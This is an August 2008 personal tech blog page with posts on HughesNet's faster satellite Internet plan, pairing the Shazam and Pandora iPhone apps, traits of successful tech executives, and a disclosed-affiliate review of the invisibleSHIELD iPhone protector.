 Wednesday, 06 August 2008

I'm a rural-living person who often consults people on how to get broadband Internet connectivity to their middle-of-nowhere homes. There's some good news for most of those people. HughesNet, the big guy in the satellite Internet service space operated by Hughes Network systems (no relation), has announced that later this month they will begin offering what they're calling the ElitePremium plan, with download speeds available as fast as 5 megabits per second (mbps). That's up there speed-wise with what many cable companies provide, and is easily a competitor to DSL speed capabilities. It'll be available to order on August 21st.

Satellite Internet has some inherent latency between the time a request is sent and the resulting data is fed to you, since the distance the signal travels, even at the speed of light, is pretty darned far. Many VPN systems have a difficult time on Satellite, also due to the time-shift latency. But the "start" delay is not huge, and once the "faucet is open," 5 mbps is pretty darned fast.

That's about five times the download speed I get on my Internet connection, which is an excellent terrestrial wireless offering from a local provider (which is Cascade Networks, if you happen to live in the Longview, Washington or Columbia County, Oregon areas). An antenna on my roof points at a tower on a mountain about 11 miles away, and that's the option I use.

So, more options and much faster speeds for us non-city-dwellers. Not a bad deal!



Tech
Wednesday, 06 August 2008 15:48:03 (Pacific Standard Time, UTC-08:00)
 Saturday, 02 August 2008

Every now and then you'll discover a couple or few smaller apps that work well together, or alongside each other. The type of situation where you get the 2+2=5 effect. Individually both apps are great, but when used together they become something even more. "Two great tastes that taste great together," to borrow an old marketing phrase.

That's been the case for me with two iPhone apps - Shazam (iTunes store page) and Pandora (iTunes store page). Today I use them alongside each other. It's my hope that someday they will be able to communicate with each other and share information.

I've written about Pandora here before. It's a web app that happens to have an iPhone client as well, where you can start with music you like and it helps you find more music that fits your taste and style. You create channels, or stations, and the Pandora service selects similar music for you to hear, and you can fine tune as you go.

Shazam is another of those magical "wow" apps for the iPhone. I use it in the car when I hear a song I like. Rarely do I know the name of the song, or even the artist. But as it plays, I just tell Shazam to listen to a 12-second portion of the song (a process called "tagging"). It uploads the resulting data to the centralized service, and back comes all the information about the song - Artist, title, album, everything. It's really amazing, and in my experience 100% accurate. From there you can also find YouTube videos and launch into the iTunes store to buy the music you've tagged.

I'll often take the name of an artist I discover from Shazam and plug the info into Pandora and start listening there. It's a great way to quickly and relatively effortlessly drill down into new music I have never heard before, but it's music that I really like.

Now imagine if you could use Shazam to identify a song and then inside Shazam choose an option to create a channel based on that artist in Pandora. That would be awesome, truly awesome. I have no idea how "possible" it is, but I can hope. :)

On a similar note - meaning various apps that work great together - ReadWriteWeb published an article this past week with a list of apps that complement each other well (including my Shazam/Pandora combination).



Mobile | Tech
Saturday, 02 August 2008 12:31:36 (Pacific Standard Time, UTC-08:00)

My title for this post sort of spins the title of the article I want to point you to, aiming for the positive side of the coin. The article, which is entitled "The Top 5 Reasons Tech Execs Fail," provides a set of bullet-pointed thoughts that can be read as a list of what tech execs need to do in order to succeed. I happen to agree with the authors' assessment.

Here's the short version of Marty Abbott and Michael Fisher's five points, slightly altered to read as a list of positive attributes of a successful tech leader:

5. Ability to Build World Class Team
4. Ability to Execute
3. Ability to Lead/Motivate/Inspire
2. Ability to Manage Operationally
1. Displays and Uses Financial Acumen

The authors point out in their article, "... when technology executives fail, it is not because they lack an individual skill. It is because they lack an adequate balance of the many technical, operational and leadership skills necessary to make them a complete manager."



Management | Tech
Saturday, 02 August 2008 11:12:23 (Pacific Standard Time, UTC-08:00)
 Friday, 01 August 2008
You should listen to your online friends. They often have great ideas, like in this case. I was recently turned on to a simple but effective alternative to bulky plastic cases and leather holsters for my new iPhone 3G. It's called the invisibleSHIELD. The product, simply put, is pretty darned terrific. You hardly know it's there, and it protects like crazy. You can also get invisibleSHIELD for the iPhone first-generation device.

Now, let me tell you right up front that when it comes time to "install" the shield on your phone, you'll need a clean work surface, a little patience, 12 to 24 hours to let your shield "cure" on the phone,  and the ability to read and follow some simple instructions. If you make sure you have those few key things taken care of, all will go well.

In the video below I show and abuse my iPhone 3G (the only one I own...) with an Invisible Shield installed. In the video you can see that there are a couple scratches under the shield. Those came from a combination of iPhone and the keys in my pocket (before I ordered the invisibleSHIELD). In fact it was those exact scratches, which I got the first day I had the phone, that prompted me to find a real, working anti-scratching solution.



I can highly recommend the Invisible Shield.

Full disclosure: Zagg (the manufacturer of the invisibleSHIELD) doesn't know I am doing this review. I found their product all on my own based on a real need, and clicking on the advertisement below takes you to my link on their product site - If you buy something there I'll get a small chunk of the change you spend. If you don't like that idea, no problem - just go to zagg.com and click through to the iPhone 3G page (or whatever product you want to cover and protect - For me, my MacBook Air is next).

invisibleSHIELD for iPhone 3G  



Apple | Mobile | Tech
Friday, 01 August 2008 20:05:28 (Pacific Standard Time, UTC-08:00)